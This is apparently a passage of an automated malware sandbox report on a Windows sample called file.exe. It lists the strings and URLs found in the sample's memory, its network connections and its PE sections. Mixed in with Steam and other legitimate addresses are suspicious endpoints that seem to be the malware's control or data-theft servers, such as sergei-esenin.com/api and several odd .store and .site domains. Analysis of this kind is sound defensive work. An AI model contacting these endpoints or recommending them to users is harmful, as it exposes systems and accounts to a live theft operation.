    Source: file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a619$e
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
    Source: file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
    Source: file.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site:443/api_
    Source: file.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site:443/apif
    Source: file.exe, 00000000.00000003.1703595779.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707198878.0000000000D0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.stea):
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steam
    Source: file.exe, 00000000.00000003.1703595779.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707198878.0000000000D0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamsta
    Source: file.exe, 00000000.00000003.1703595779.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707198878.0000000000D0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/applications/community/main.css?v=DVae4t4RZiHA&l=en
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&l=english
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&l=engl
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/header.css?v=pTvrRy1pm52p&l=english
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&l=english
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/main.js?v=4XouecKy8sZy&am
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=r7a4-LYcQOj
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&l=english
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/modalContent.js?v=XpCpv
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/modalContent.js?v=XpCpvP7feUoO&l=english
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/profile.js?v=bbs9uq0gqJ-H&l=english
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/promo/stickers.js?v=W8NP8aTVqtms&l=english
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=english
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/webui/clientcom.js?v=jq1jQyX1843y&l=english
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&l=english
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&l=english
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/css/sh
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_global.css?v=uF6G1wyNU-4c&l=english
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_responsive.css?v=kR9MtmbWSZEp&l=engli
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&l=engl
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_global.js?v=7glT1n_nkVCs&l=eng
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunf
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstu
    Source: file.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eaglepawnoy.store:443/apiG
    Source: file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://licendfilteo.site:443/api8
    Source: file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
    Source: file.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobbipenju.store:443/apibcryptPrimitives.dll%
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707198878.0000000000D0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: file.exe, 00000000.00000003.1703595779.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707198878.0000000000D0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/5L
    Source: file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C66000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707198878.0000000000D0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiU
    Source: file.exe, 00000000.00000003.1703595779.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707198878.0000000000D0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiin
    Source: file.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
    Source: file.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api~
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: file.exe, 00000000.00000003.1694850677.0000000000C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C0e3d185a3e106e7
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://studennotediw.store:443/api
    Source: file.exe, 00000000.00000003.1702917421.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707016572.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5
    Source: file.exe, 00000000.00000003.1694712578.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694850677.0000000000C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/acces
    Source: file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: file.exe, 00000000.00000003.1702540658.0000000000D10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49731 version: TLS 1.2

    System Summary

    barindex
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005602280_2_00560228
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058F6200_2_0058F620
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005940400_2_00594040
